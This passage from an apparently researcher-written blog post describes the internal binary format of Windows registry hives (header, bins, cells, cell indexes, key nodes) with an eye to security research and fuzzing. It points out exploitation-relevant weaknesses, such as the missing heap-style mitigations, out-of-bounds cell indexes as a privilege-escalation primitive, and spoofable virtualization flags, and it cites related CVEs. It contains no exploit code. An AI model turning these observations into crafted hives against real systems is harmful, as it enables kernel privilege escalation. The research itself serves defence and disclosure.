most consequential fields in the header: they represent the major and minor version of the hive. The only valid major version is 1, while the minor version has been historically an integer between 0 and 6. Here is an overview of the different 1.x versions in existence: Version Year Introduced in New features 1.0 1992 Windows NT 3.1 Pre-Release Initial format 1.1 1993 Windows NT 3.1 1.2 1994 Windows NT 3.5 Predefined keys 1.3 1995 Windows NT 4.0 Fast leaves 1.4 2000 Windows Whistler Beta 1 Big value support 1.5 2001 Windows XP Hash leaves 1.6 2016 Windows 10 Anniversary Update Layered keys The later versions draw extensively on the earlier ones both conceptually and in terms of the actual implementation – there are non-trivial portions of code in Windows NT 3.1 Beta that are used to this day in the latest Windows 11. But when it comes to pure binary compatibility, versions 1.0 to 1.2 differ too much from the newer ones and have long been considered obsolete. This leaves us with versions ≥ 1.3, which are all cross-compatible and can be used freely on the current systems. Within this group, version 1.4 was an intermediate step in the development of the format, observed only in beta releases of Windows XP (codenamed Whistler). The other three are all in active use, and can be found in a default installation of Windows 10 and 11: 1.3: encodes volatile hives (the root hive, HKLM\HARDWARE), the BCD hive (HKLM\BCD00000000), the user classes hives (HKU\_Classes), and some application hives (backed by settings.dat).1.5: encodes a majority of the system hives in HKLM (SYSTEM, SOFTWARE, SECURITY, SAM, DRIVERS), all user hives (HKU\), and most application hives (backed by ActivationStore.dat).1.6: encodes all differencing hives, i.e. hives used by processes running inside Application and Server Silos, mounted under \Registry\WC. It is worth noting that the hive version is supposed to be indicative of the features used inside; for example, only hives with versions ≥1.4 should use big values (values longer than 1 MiB), only hives with versions ≥1.5 should use hash leaves, etc. However, this is not actually enforced when loading a hive, and newer features being used in older hives will work completely fine. This behavior may become a problem if any part of the registry code makes any assumptions about the structure of the hive based solely on its version. One example of such a vulnerability was CVE-2022-38037, caused by the fact that the CmpSplitLeaf kernel function determined the format of a subkey list based on the hive version and not the binary representation of the list itself. In general, when writing a registry-specific fuzzer, it might be a good idea to flip the minor version between 3-6 to increase the chances of hitting some interesting corner cases related to version handling. As a last note, the version number is internally converted to a single 32-bit integer stored in the _HHIVE.Version structure member using the following formula: Minor+(Major*0x1000)-0x1000. In the typical case where the major version is 1, the last two components cancel each other out, e.g. version 1.5 becomes simply "5". This would be fine, if not for the fact that a major version of 0 is also allowed by HvpGetHiveHeader, in which case the minor version can be any value greater or equal to 3. Furthermore, if the kernel enters the header recovery path (because the hive header is corrupted and needs to be recovered from a .LOG file), then one can set the major/minor fields to completely arbitrary values and they will be accepted, as HvAnalyzeLogFiles doesn't perform the same strict checks that HvpGetHiveHeader does. Consequently, it becomes possible to spoof the version saved in _HHIVE.Version and have it take virtually any value in the 32-bit range, but I haven't found any security implications of this behavior, and I'm sharing it simply as a curiosity.RootCell This is the cell index (offset in the hive file) of the root key, which marks a starting point for the Configuration Manager to parse the hive tree. The root cell is special in many respects: it is the only one in a hive that doesn't have a parent, it cannot be deleted or renamed, its name is unused (it is instead referenced by the name of its mount point), and its security descriptor is treated as the head of the security descriptor linked list. While the RootCell member itself has not been directly involved in any bugs I am aware of, it is worth keeping its special properties in mind when doing registry security research.Length Specifies the cumulative size of all bins in the hive, i.e. its file size minus 4096 (the size of the header). It is limited to 0x7FFFE000, which reflects the ~2 GiB capacity of the hive stable storage (the part of the hive that resides on disk). Combined with another ~2 GiB of volatile space (in-memory hive data that gets erased on reboot), we get a total maximum size of around 4 GiB when both types of storage space are completely maxed out. Incidentally, that's the same range as a single 32-bit cell index can address.Flags There are currently only two supported hive flags: 0x1, which indicates whether there are any pending transactions involving the hive, and 0x2, which expresses whether the hive is differencing and contains layered keys or not. The latter flag is typically set when the hive version is 1.6.LastReorganizeTime In order to address the problem of accumulating fragmentation over time, Windows 8.1 introduced a new mechanism to both shrink and optimize hives during load called reorganization. It happens automatically if the last reorganization took place more than seven days ago and the fragmentation rate of the hive is greater than 1 MiB. Reorganization achieves its goals by starting off with an empty hive and copying all existing keys recursively, taking into account which ones have been used during boot, during system runtime, and not at all since the last reorganization. The end result is that the hive becomes more packed, thanks to the elimination of free cells taking up unnecessary space, and more efficient to operate on, because the "hot" keys are grouped closer together. As the name suggests, the LastReorganizeTime member stores the timestamp of the last time a successful reorganization took place. From an attacker's perspective, it can be adjusted to control the behavior of the internal CmpReorganizeHive function and deterministically trigger the reorganization or skip it, depending on the desired end result. In addition to indicating a timestamp, the LastReorganizeTime field may also be equal to one of two special marker values: 0x1 to have the hive unconditionally reorganized on the next load, and 0x2 to clear the access bits on all the keys in the hive, i.e. reset the key usage information that has been collected so far.CheckSum The CheckSum field at offset 0x1FC stores the checksum of the first 508 bytes of the header (i.e. all data prior to this field), and is simply a 32-bit XOR of the header data treated as a series of 127 consecutive DWORDs. If the computed value is equal to 0xFFFFFFFF (-1), then the checksum is set to 0xFFFFFFFE (-2), and if the computed value is 0x0, then the checksum is 0x1. This means that 0 (all bits clear) and -1 (all bits set) are never valid checksum values. If you wish to examine the kernel implementation of the algorithm, you can find it in the internal HvpHeaderCheckSum function. The checksum is particularly important when making changes to existing hives, either for experimentation or during fuzzing. If any data within the first 508 bytes of the file is modified, the checksum needs to be adjusted accordingly. Otherwise, the system will reject the file early in the loading process with the STATUS_REGISTRY_CORRUPT error code, and none of the deeper code paths will be exercised. Therefore, fixing up the checksum is the bare minimum a hive fuzzer should do to maximize its chances of success.Other fields There are several other pieces of information in the header that carry some value, more so in the context of digital forensics and incident response than strictly low-level system security. For example, "Signature" identifies the file as a regf hive and may make it easier to identify the format in raw memory/disk dumps, while "TimeStamp" indicates the last time the hive has been written to, which can be critical for establishing a timeline of events during an investigation. Furthermore, the Offline Registry Library (offreg.dll) leaves further traces in the generated hive files: a 4-byte "OfRg" identifier at offset 0xB0 (nominally the Reserved1 field) and a serialization timestamp at offset 0x200 (nominally Reserved2). For more information about the meaning and usefulness of each part of the header, please refer to one of the unofficial format specifications.Bins Bins in registry hives are a simple organizational concept used to split a potentially large hive into smaller chunks that can be mapped in memory independently of each other. Each of them starts with a 32-byte _HBIN structure: 0: kd> dt _HBIN nt!_HBIN    +0x000 Signature        : Uint4B    +0x004 FileOffset       : Uint4B    +0x008 Size             : Uint4B    +0x00c Reserved1        : [2] Uint4B    +0x014 TimeStamp        : _LARGE_INTEGER    +0x01c Spare            : Uint4B The four meaningful fields here are the four-byte signature ("hbin"), offset of the bin in the file, size of the bin, and a timestamp. Among them, the signature is a constant, the file size is sanitized early in the hive process and effectively also a constant, and the timestamp is not security-relevant. This leaves us with the size as the most interesting part of the header. The only constraints for it is that it must be a multiple of 0x1000, and the sum of the offset and size must not exceed the total length of the hive (_HBASE_BLOCK.Length). At runtime, bins are allocated as the smallest 4 KiB-aligned regions that fit a cell of the requested size, so in practice, they typically end up being between 4-16 KiB in size, but they may organically be as long as 1 MiB. While longer bins cannot be produced by the Windows kernel, there is nothing preventing a specially crafted hive from being loaded in the system with a bin of ~2 GiB in size, the maximum length of a hive as a whole. This behavior doesn't seem to have any direct security implications, but more generally, it is a great example of how the hive states written by Windows are a strictly smaller subset of the set of states accepted as valid during loading: Cells Cells are the smallest unit of data in registry hives – they're continuous buffers of arbitrary lengths. They do not have a dedicated header structure like _HBASE_BLOCK or _HBIN, but instead, each cell simply consists of a signed 32-bit size marker followed by the cell's data. The size field is subject to the following constraints: A cell may be in one of two states – allocated and free – as indicated by the sign of the size value. Positive values are used for free cells, and negative ones for allocated cells.The size value accounts for the four bytes occupied by itself.The size value must be a multiple of 8 (i.e. have its three lowest bits set to zero). If a cell with size non-divisible by 8 is allocated at runtime, it is aligned up to the next multiple of 8, potentially leading to some unused padding bytes at the end of the cell.The sum of all consecutive cells in a bin must be equal to the length of the bin. In other words, the bin header followed by tightly packed cells (with no gaps) completely fill the bin space. If the hive loader detects that this is not the case, it forcefully fixes it by creating a single free cell spanning from the failing point up to the end of the bin. This invariant must subsequently hold for the entire time the hive is loaded in the system. If cells remind you of heap allocations requested via malloc or HeapAlloc, it is not just your impression. There are many parallels to be drawn between hive cells and heap buffers: both can be allocated and freed, have arbitrary sizes and store a mixture of well-formatted structures and free-form user data. However, there are some significant differences too: heap implementations have evolved to include anti-exploitation mitigations like layout randomization, heap cookies for metadata protection, double-free detection and miscellaneous other consistency checks. On the other hand, hives have none of that: the allocation logic is fully deterministic and doesn't involve any randomness, there is no metadata protection, and generally little to no runtime checks. This is likely caused by the fact that heap chunks have been targets of memory corruption for many decades, whereas the registry was designed with the assumption that once loaded, the hive structure is always internally consistent and intra-hive memory corruption may never occur. This makes the exploitation of certain registry bugs particularly convenient and reliable, as I will demonstrate in future blog posts. Like a typical memory allocator interface, cells have alloc, realloc, and free functions. Specifically, the internal routines responsible for these tasks in the Windows kernel are HvAllocateCell, HvReallocateCell and HvFreeCell, and reverse-engineering them allowed me to uncover some helpful insights. For instance, I have found that HvAllocateCell and HvReallocateCell reject allocation sizes larger than 1 MiB, and for requests above 16 KiB, they round the size up to the next power of two. Meanwhile, HvFreeCell performs coalescing of free cells, so there should never be two adjacent free cells in an organically created hive. These are some further examples of behavior that is guaranteed on output, but not enforced on input. This is a prevalent pattern in the Windows registry, and I found it useful to keep track of such primitives in my research, even if they didn't seem particularly useful at the time. Thanks to this, I have discovered at least three security bugs closely related to this phenomenon, including one in the interactions between HvReallocateCell and its callers (CVE-2022-37988).Cell indexes If we equate cells to heap buffers in user-mode applications, then cell indexes would be pointers. Cells rely on these indexes to interrelate within the registry's complex structure. For example, keys reference security descriptors (to control access), their parent key (to navigate the hierarchy), and optionally the list of subkeys and list of values (to organize data). The list of values references specific value records, which in turn reference the actual data backing cells, and so on. This intricate web of relationships is no different from any semi-complex object in a C/C++ program, where pointers link various data structures. On disk, cell indexes are nothing special: they are simply 32-bit offsets from the start of the hive data (after the 0x1000 byte header), which is a typical way of implementing cross-object references in most file formats. However, it's important to note that a cell index must point to the beginning of a cell (not inside it or in the bin header), and the cell must be in the allocated state – otherwise, the index is considered invalid. So when implementing a read-only regf parser operating on the hive as a contiguous memory block, translating cell indexes is as simple as adding them to the starting address of the hive in memory. When a hive is loaded in Windows, the management of cell indexes becomes more complex. Hives at rest have a maximum size of 2 GiB, and all of their data is considered stable (persistently stored). On the other hand, an active hive also gains an additional 2 GiB of volatile storage, used for temporary keys and values that reside only in memory. These temporary entries exist only while the hive is loaded (or until the system is shut down) and can be created by calling RegCreateKeyEx with the REG_OPTION_VOLATILE flag, which designates the key as temporary. To distinguish between these two storage spaces in a cell index, the highest bit serves as an indicator: 0x0 for stable space and 0x1 for the volatile one, resulting in large index values (greater than 0x80000000) that readily identify volatile cells. But an even bigger complication stems from the fact that hives can shrink and grow at runtime, so it is largely impractical to have them mapped as a single block of memory. To efficiently handle modifications to the registry, Windows maps hives in smaller chunks, which makes the previous method of translating cell indexes obsolete, and necessitates a more sophisticated solution. The answer to the problem are cell maps – pagetable-like structures that divide the 32-bit hive address space into smaller, nested layers, indexed by the respective 1, 10, 9, and 12-bit parts of the 32-bit cell index. Cell maps in the Windows kernel utilize a hierarchical structure consisting of storage arrays, directories, tables, and leaf entries, all defined within the ntoskrnl.exe PDB symbols (the relevant structures are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY). The layout of cell indexes and cell maps is illustrated in the diagram below, based on a similar diagram in the Windows Internals book, which itself draws from Mark Russinovich's 1999 article, Inside the Registry: Cell indexes play a central role in core registry operations, such as creating, reading, updating, and deleting keys and values. The internal kernel function responsible for traversing the cell map and translating cell indexes into virtual addresses is HvpGetCellPaged. In normal conditions, the indexes stay within the bounds of the storage space size (_HHIVE.Storage[x].Length), so HvpGetCellPaged assumes their validity and doesn't perform any additional bounds checking. However, certain memory corruption vulnerabilities may allow attackers to manipulate these cell indexes at runtime. Crucially, I discovered that out-of-bounds cell indexes can serve as a powerful primitive for exploit development, enabling the construction of proof-of-concept exploits that achieve local elevation of privileges. I will elaborate further on this in future exploit-focused blog posts. As a last note, the special marker of -1 (0xFFFFFFFF) is used to represent non-existent cells, and can be found in cell indexes pointing at optional data that doesn't exist – basically a hive equivalent of a NULL pointer. The internal name for the constant in the Windows kernel is HCELL_NIL, and under normal circumstances, it should never be passed directly to HvpGetCellPaged. Doing so without guaranteeing that the cell index is valid first would constitute a bug in the Windows kernel (for example, see CVE-2023-35357 or CVE-2023-35358).Cell types Now that we have familiarized ourselves with the low-level structure of hives that facilitates their efficient management in memory, let's go a little further and learn about the types of information stored in the cells. These are the objects that actually define the registry tree and all of its properties: keys, values, security descriptors, etc. The first subsection provides a general overview of the various cell types found within a hive and the relations between them. The second one goes into the intricate details of their format and usage within the Windows kernel, uncovering obscure implementation details rarely documented elsewhere.Overview of cell types Registry hives utilize only seven distinct cell types to represent the various data structures within the registry, as outlined below: Key Node: Represents a single registry key and its associated metadata. It is defined by the _CM_KEY_NODE structure and contains references to other cells, including its parent key, security descriptor, class data (optional), and lists of subkeys (stable and volatile) and values (optional).Subkey Index: A variable-length list of key node cell indexes, representing the subkeys of a specific key. For performance reasons, there are four variations of subkey indexes: index leaf, fast leaf, hash leaf, and root index. All are represented by the _CM_KEY_INDEX structure.Security Descriptor: Defines access control information for one or more keys, specifically a security descriptor in a self-relative format. Represented by the _CM_KEY_SECURITY structure, it is the only cell type that can be referenced from multiple key nodes and is therefore reference-counted. It also contains links to the next and previous security descriptors in the hive.Key Value: Defines a single value associated with a key, including its name, type, data length, and a reference to the cell containing the actual data. It is represented by the _CM_KEY_VALUE structure.Big Data: Used to store value data exceeding 16,344 bytes (~16 KiB) in hive versions 1.4 and later. The data is divided into chunks of up to 16 KiB each, allowing for values approaching 1 GiB. The _CM_BIG_DATA structure represents this cell type, containing the number of chunks and a reference to the list of chunk cells.Value List and Chunk List Cells: These cells are simple arrays of 32-bit cell indexes. They are used to store lists of values associated with a key and lists of chunks for large value data.Data Cells: These cells store the raw data associated with keys and values. They hold the optional class data for a key, the complete data for small values (up to 1 MiB in older hives, ~16 KiB in newer hives), and the individual chunks of large values. The diagram below illustrates the relationships between these cell types: Deep dive into each cell type Now that we know the general purpose of each cell type, it's a good time to dig a little deeper into each of them. This lets us explore both their implementation details, as well as the spirit behind these objects and how they interact with each other in a real-life environment. I have tried my best to avoid repeating the existing unofficial specifications and instead only focus on the security-relevant and sparsely documented aspects of the format, but if any redundant information makes it into this section, please bear with me. 🙂Key nodes As keys are the most important part of the registry, key nodes are the most important and complex of all cell types. When dumped in WinDbg, the layout of the _CM_KEY_NODE structure is as follows: 0: kd> dt _CM_KEY_NODE /r nt!_CM_KEY_NODE    +0x000 Signature        : Uint2B    +0x002 Flags            : Uint2B    +0x004 LastWriteTime    : _LARGE_INTEGER    +0x00c AccessBits       : UChar    +0x00d LayerSemantics   : Pos 0, 2 Bits    +0x00d Spare1           : Pos 2, 5 Bits    +0x00d InheritClass     : Pos 7, 1 Bit    +0x00e Spare2           : Uint2B    +0x010 Parent           : Uint4B    +0x014 SubKeyCounts     : [2] Uint4B    +0x01c SubKeyLists      : [2] Uint4B    +0x024 ValueList        : _CHILD_LIST       +0x000 Count            : Uint4B       +0x004 List             : Uint4B    +0x01c ChildHiveReference : _CM_KEY_REFERENCE       +0x000 KeyCell          : Uint4B       +0x008 KeyHive          : Ptr64 _HHIVE    +0x02c Security         : Uint4B    +0x030 Class            : Uint4B    +0x034 MaxNameLen       : Pos 0, 16 Bits    +0x034 UserFlags        : Pos 16, 4 Bits    +0x034 VirtControlFlags : Pos 20, 4 Bits    +0x034 Debug            : Pos 24, 8 Bits    +0x038 MaxClassLen      : Uint4B    +0x03c MaxValueNameLen  : Uint4B    +0x040 MaxValueDataLen  : Uint4B    +0x044 WorkVar          : Uint4B    +0x048 NameLength       : Uint2B    +0x04a ClassLength      : Uint2B    +0x04c Name             : [1] Wchar In the following subsections, each member is discussed in more detail.Signature This field always stores the special value 0x6B6E, which translates to 'nk' when written in little-endian. It exists for informational purposes only, and isn't used for anything meaningful in the code after the initial sanitization during load.Flags This is a highly interesting and security-relevant field, as it indicates the role of the key in the hive, and clarifies how certain parts of the key node are formatted. The present and historical flags are presented in the table below together with their names and descriptions: Mask Name Description 0x0001 KEY_VOLATILE (Deprecated) The flag used to indicate that the key and all its subkeys were volatile, but it is obsolete now and hasn't been used in several decades. Information about the key stable/volatile state can be inferred from the highest bit of the key's cell index. 0x0002 KEY_HIVE_EXIT Indicates that the key is the mount point of another registry hive. These special mount points are used to facilitate attaching new registry hives to the global registry view starting at \Registry in a live system. Exit nodes only ever exist in memory, so hives on disk mustn't have the flag set. More on the subject of mount points and exit nodes can be found in the next section, "Link nodes". 0x0004 KEY_HIVE_ENTRY Indicates that the given key is the entry to a hive, or in other words, the root of a hive. The flag must be set on the root key of each hive, and mustn't be set on any other nested keys. A hive entry key cannot be a symbolic link (KEY_SYM_LINK mustn't be set). 0x0008 KEY_NO_DELETE Indicates that the key cannot be deleted: any attempt to do so will return the error code STATUS_CANNOT_DELETE. This flag is always set on hive exit and hive entry keys, but is not allowed for any other keys. 0x0010 KEY_SYM_LINK Indicates that the key is a symbolic link, which has been created by specifying the REG_OPTION_CREATE_LINK flag in the RegCreateKeyEx call. They are freely accessible and don't come with many restrictions: every key other than a hive exit/entry key can be a symbolic link. However, they are required to adhere to additional structural requirements: they may only contain up to one value, and that value must be of type REG_LINK (6), named "SymbolicLinkValue", and a maximum of 65534 bytes long (32767 wide characters). 0x0020 KEY_COMP_NAME Indicates that the name of the key consists of ASCII characters only, and thus it has been "compressed" to fit two 8-bit characters in each of the 16-bit wide characters of _CM_KEY_NODE.Name. This optimization aims to save storage space and memory, especially as a great majority of keys have simple, alphanumeric names. This flag can be set on virtually every key in the registry, and indeed, it is by far the most commonly used one. 0x0040 KEY_PREDEF_HANDLE (Deprecated) The flag used to indicate that the key was a "predefined-handle key", which was a special kind of a symbolic link. The name refers to Predefined Keys, a set of top-level keys such as HKLM or HKCU recognized by the Win32 API. Keys with the KEY_PREDEF_HANDLE flag set allowed the system to redirect certain keys to chosen 32-bit HKEY pseudo-handles, and were specifically introduced in Windows NT 3.5 in 1994 for the purpose of redirecting two system keys related to reading performance data through the registry:HKLM\Software\Microsoft\Windows NT\CurrentVersion\Perflib\009 → HKEY_PERFORMANCE_TEXTHKLM\Software\Microsoft\Windows NT\CurrentVersion\Perflib\CurrentLanguage → HKEY_PERFORMANCE_NLSTEXT Contrary to regular symbolic links, predefined keys re-purposed parts of the key node structure (specifically the value list length) to store the link destination, instead of using higher-level features of the format (such as the "SymbolicLinkValue" which is otherwise a perfectly normal value associated with a key). Such a change in semantics required a significant amount of special handling of predefined keys, which were not supposed to be operated on other than being opened. This, in turn, led to a number of security vulnerabilities related to the feature. For a detailed case study of one of them, CVE-2023-35633, see my Windows Registry Deja Vu: The Return of Confused Deputies talk from CONFidence 2024. As recently as 2023, all keys other than hive roots could be predefined keys, provided that they had been manually crafted in a binary controlled hive, because there was otherwise no supported way to create them via API. As a consequence of my reports, the feature was deprecated completely in July 2023 for Windows 10 1607+ and 11, and in December 2023 for older systems. At the time of this writing, the only two predefined keys left in existence are the original "009" and "CurrentLanguage" ones, and all other such keys are transparently converted to normal keys during hive load. Furthermore, there are also three flags related to Registry Virtualization, which was introduced in Windows Vista and is supported up to and including Windows 11: Mask Name Description 0x0080 VirtualSource Indicates that the key has been subject to virtualization, i.e. that it has a counterpart in the virtual store subtree. It is typically set on keys inside HKLM\Software which have been attempted to be opened with write access by a program running as a non-administrator. 0x0100 VirtualTarget Indicates that the key is a virtual replica of a key in a global system hive that has been subject to virtualization. It is typically set on keys inside HKU\_Classes\VirtualStore that have been created as a result of virtualization. It can only be set if VirtualStore (0x200) is set on the key, too. 0x0200 VirtualStore Indicates that the key is part of the virtual store registry subtree, typically HKU\_Classes\VirtualStore and its subkeys. It means that new virtualization targets may be created inside the key, but it itself isn't necessarily a virtual key (unless the VirtualTarget flag is also set). As we can see, the purpose of these flags is to keep track of the virtualization state of each key. Given that they express the internal state of the key and are intended to be modified by the kernel only, there doesn't seem to be a good reason to allow user-mode clients to modify the flags on demand. But in practice, unprivileged users have a lot of control over them: programs may arbitrarily set them in hives loaded from disk that they control (app hives and the user hive), and they may also set and clear them at runtime with the NtSetInformationKey(KeySetVirtualizationInformation) system call, as long as they are granted KEY_SET_VALUE access to the key. This makes it effectively possible to "spoof" virtual source/target/store keys, and opens up all of the registry virtualization code for potential abuse by unprivileged users. This has led to the discovery of multiple bugs directly related to virtualization: CVE-2015-0073 and CVE-2019-0881 by James Forshaw, and several more as part of my recent research.LastWriteTime This is yet another timestamp, in this case tracked on a key-granularity level. I assume it may be an interesting artifact for purposes of digital forensics, but otherwise it doesn't seem particularly security-relevant. One thing of note is that this information is very easy to query at runtime, as it is returned by the RegQueryInfoKey API, and is also a part of the output structures of numerous key information classes that can be queried via the NtQueryKey system call.AccessBits While theoretically an 8-bit field, this is effectively a 2-bit bitmask introduced in Windows 8 as part of the hive reorganization logic described earlier. It tracks the system phase(s) in which the key has been accessed: 0x0 if not accessed at all, 0x1 if accessed during boot, and 0x2 if accessed during normal system operation. This information is then used during reorganization to allocate key nodes with similar access bits close together.LayerSemantics This member is a 2-bit enum, used exclusively in hive version 1.6, which corresponds to differencing hives (also known as delta hives). Differencing hives are closely related to containerization support, and their purpose is to be overlaid on another hive in the system rather than being mounted as a standalone hive. For this reason, every key in a differencing hive is in one of four states, which indicate how the key should be interpreted in relation to the keys below it (i.e. the corresponding keys in lower-layer hives). These four states are:Merge-Backed (0): the properties of the key are meant to be merged with the properties of the underlying keys in the key stack.Tombstone (1): the key is deleted at the current level, so none of the keys below it should be considered.Supersede-Local (2): the properties of the key fully supersede any state in the key stack below it: only values associated with that level (and any upper layers) are visible to the user.Supersede-Tree (3): same as Supersede-Local, but it applies to the key itself and recursively to all of its subkeys. There is also an additional, implicit state called Merge-Unbacked, used to describe keys that don't exist in a hive at a given level, and so they simply fall through to the state represented by keys in the lower layers. Overall, layer semantics play a crucial role in the functionality of layered keys and differencing hives, and their correct handling in the registry implementation is paramount to system security and stability. Unfortunately, the feature is too complex to thoroughly discuss here, but there are some excellent resources on the subject: Microsoft's Containerized Configuration (US20170279678A1) patent, Maxim Suhanov's Containerized registry hives in Windows blog post, and the "Registry virtualization" section in Chapter 10 of the Windows Internals 7 (Part 2) book.InheritClass This bit is also related to layered keys, and it indicates whether the key inherits the class value from its counterparts lower in the key stack, or defines its own (or lack thereof).Parent The field identifies the key node that acts as this key's parent within the registry's hierarchical structure. Except for root keys, which exist at the topmost level of a hive, every key must have a valid Parent field. This index plays a vital role in navigating the registry and modifying key relationships. For example, it's essential for determining a key's full path or ensuring correct alphabetical order when renaming a key within its parent's subkey list.SubKeyCounts This two-element array of DWORDs stores the number of the key's stable and volatile subkeys, respectively. Even though the integers are 32 bits wide, the actual number of subkeys is limited by the upper bound of all keys in a hive in a specific storage space, which is roughly 2 GiB (storage space size) ÷ 84 bytes (minimum key node size) ≈ 25.5 million keys. The data in this field is somewhat redundant, as the same information is also stored in the subkey indexes themselves. Nevertheless, the cached numbers stored directly in the key node make it possible to efficiently query the numbers of subkeys with API such as RegQueryInfoKey. The kernel does its best to keep the two copies of the information in sync, and any discrepancies between them may lead to memory corruption vulnerabilities.SubKeyLists This is another two-element array, which complements the previous SubKeyCounts member by providing cell indexes to the corresponding subkey lists for each storage type. The format of these lists is discussed in detail in the "Subkey indexes" section below; for now, it's only important to know that if SubKeyCounts[x] > 0, then SubKeyLists[x] is expected to be a valid cell index, otherwise it should be equal to HCELL_NIL (-1). Furthermore, because the volatile space is a strictly in-memory concept that doesn't exist on disk, newly loaded hives are always expected to have SubKeyCounts[1] set to 0 and SubKeyLists[1] set to HCELL_NIL.ValueList This is a structure of type _CHILD_LIST, which consists of two 32-bit integers: the number of values associated with the key, and a cell index of the actual value list. Here, there is no distinction between stable and volatile values: for any given key, the values always inherit the storage type of the key, so either all of them are stable, or all of them are volatile. Similarly to subkey lists, though, if ValueList.Count is 0, then ValueList.List must be HCELL_NIL. As mentioned earlier, this field also had a second meaning if the key was a predefined key: in that case, ValueList.Count contained an arbitrary value with the highest bit set, which indicated the top-level HKEY to redirect to, and ValueList.List was completely unused and could contain arbitrary data. As you can imagine, whenever an internal system function started to use such a value list with the assumption it was a normal key, it would operate on an inadequately huge count and an invalid cell index, wrecking havoc in the kernel. Thankfully, this is no longer a possibility due to the deprecation of predefined keys in 2023.ChildHiveReference You may have noticed that ChildHiveReference is part of a union, as it resides at the same offset as the SubKeyLists member (offset 0x1C). It is a special object that is used to implement hive mounting under the \Registry tree, and is unique to keys that have the KEY_HIVE_EXIT flag set (i.e. exit nodes). It is only ever used in memory, and is therefore not applicable to regular hives stored on disk. Its two fields specify the root key of the mounted hive, as a pair of a kernel pointer to the _HHIVE descriptor structure and the cell index of the root key. This breaks the fundamental invariant that hives are self contained and don't store any virtual address pointers, only cell indexes. It is the only exception to the rule, and only because it is a necessary hack/workaround to implement a feature that hives normally don't support: attaching one hive to another in the global system view. The field and its usage are discussed in more detail in the "Link nodes" section below.Security This is the cell index of the security descriptor cell corresponding to the key. It is a mandatory field for every type of key in the registry (symbolic links, previously predefined keys etc.), with the only exception being system-managed exit nodes. For every key that has an invalid security descriptor during hive load (e.g. set to HCELL_NIL or just an invalid cell index), it is automatically fixed up to inherit the security descriptor of its parent key. If the root key of a hive has invalid security, the whole hive is rejected with the STATUS_REGISTRY_CORRUPT error code. The security descriptor cell always has the same storage type as the key(s) that it is associated with. So for example, if there are two keys in a hive with the same security properties, one in the stable and the other in the volatile space, then they will reference two different stable/volatile security cells with equivalent data. For obvious reasons, the correct handling of this field is crucial to overall system security. In the course of my research, I have discovered 9 vulnerabilities directly involving the handling of security descriptors, and a further 4 reported to Microsoft outside of the tracker (WinRegLowSeverityBugs #1, #10, #13, #20). They generally didn't have much to do with the  _CM_KEY_NODE.Security field specifically, but rather the formatting of the security cells and higher-level logic related to them:Binary formatting of the SECURITY_DESCRIPTOR_RELATIVE structureMaintaining the consistency of the doubly-linked list of security descriptors in the hiveReference counting security descriptors when operating on keysEnforcing proper access checks when opening and creating keys Overall, this is probably the most interesting field in the structure from a security research perspective.Class and ClassLength In technical terms, a key class is an optional, immutable blob of 1-65535 bytes associated with a key. It can only be set once, during the creation of a key, through the lpClass argument of the RegCreateKeyExW API (or the equivalent Class parameter of the NtCreateKey system call). It can be then queried with functions such as RegQueryInfoKey, but cannot be modified without deleting and re-creating the key. If the class exists, then the ClassLength field is set accordingly, and Class is a cell index that points to its backing buffer. Otherwise, ClassLength is set to 0 and Class is HCELL_NIL (-1). Conceptually, a class can be viewed as an extra, hidden value of a key, existing alongside the normal value list. It is not displayed anywhere in the Regedit GUI, but if it exists for a given key, it can be retrieved by using the "Export" option in Regedit to save the key to a .txt file, which also exports the class data. It has existed since the earliest version 1.0 of the regf format – perhaps as a way to store the "type" of a key similar to how every value has a defined type. Today, it seems to be a mostly obsolete mechanism that doesn't see much use; even Raymond Chen wrote in his What is the terminology for describing the various parts of the registry? blog in 2009: Bonus chatter: There’s also this thing called a class. I have no idea what it’s for, so don’t ask. When I ran a quick scan of the Windows 11 registry, I found the following unique strings being used at least once as a key class: "DynDRootClass""GenericClass""Network ComputerName""REG_SZ""Shell" The Windows NT Registry File (REGF) format specification lists several other values that have been observed in the past, such as "activeds.dll ", "Cygwin", "OS2SS" or "TCPMon". It is worth noting that the class was also used to store the encryption keys for the now-deprecated SAM database encryption mechanism known as SysKey. Overall, due to its simplistic nature, key classes are not particularly security-relevant, but may be of interest in the context of obfuscation and hiding data, as they are easily accessible and yet a largely overlooked part of the registry.MaxNameLen, MaxClassLen, MaxValueNameLen and MaxValueDataLen These four fields store cached information about the maximum lengths of several properties of the key or its subkeys: MaxNameLen: the maximum length of a subkey's name,MaxClassLen: the maximum length of a subkey's class information,MaxValueNameLen: the maximum length of a value name associated with the key,MaxValueDataLen: the maximum length of a value data associated with the key. The presumed purpose of these members is to facilitate a quick lookup of the per-key limits, such that when a client application wants to enumerate/query subkeys or values, it can simply allocate a single buffer guaranteed to accommodate every possible key name, value name, etc. And so, their exact values can be retrieved with the RegQueryInfoKey API via the lpcbMaxSubKeyLen, lpcbMaxClassLen, lpcbMaxValueNameLen and lpcbMaxValueLen arguments. Although querying these limits seems convenient, there are some caveats that are important to keep in mind: The fields are intended to represent the lower bound of the number of bytes required to store the given property, but not necessarily to be optimal (i.e. to be the smallest sufficient length). For example, when a key with formerly the longest name is deleted, the MaxNameLen field of the parent is not updated with the value of the second-largest length, as that would require the lengthy process of iterating through all of the subkeys again. Therefore, relying on those values may incur some unwanted memory overhead.When operating on registry keys that are globally visible in the registry tree, it is possible that a race condition with another application causes one of the maxima to change in between the RegQueryInfoKey call and the actual data query. To address this, applications should include fallback logic to allocate more memory in the rare case when the obtained maximum proves insufficient.To add to the previous point, after having reverse-engineered and reviewed most of the Configuration Manager code, it is my instinct that these fields continue to be supported throughout the development of new registry features (e.g. differencing hives), but it is mostly on a best-effort basis. For example, during hive load, only MaxValueNameLen and MaxValueDataLen are enforced to have the correct values, while MaxNameLen and MaxClassLen remain unchecked. For this reason, I would personally not rely on the consistency of those values for the security of any client code, and would treat them more as a guidance/supplementary information than the sole source of truth about the key limits.UserFlags This is a field whose name, offset and function (so basically every aspect) has been subject to change over the years. Its current form has existed since Windows Vista, and occupies bits 20-23 of MaxNameLen, which had been previously a 32-bit integer, but was later reduced to 16 bits to make room for these extra flags. In theory, its name may suggest that this member is meant to store user-defined data, but in practice, Microsoft developers quickly found their own use for the bitmask: storing flags related to the Registry Reflection mechanism for providing interoperability between 32-bit and 64-bit applications. You can read more about the meaning of each specific flag here, but in short, this was where reflection-specific configuration was internally saved by API functions such as RegEnableReflectionKey and RegDisableReflectionKey, and retrieved by RegQueryReflectionKey. However, this specific use seems to have been short-lived, as Registry Reflection was soon deprecated in Windows 7. Since then, it could 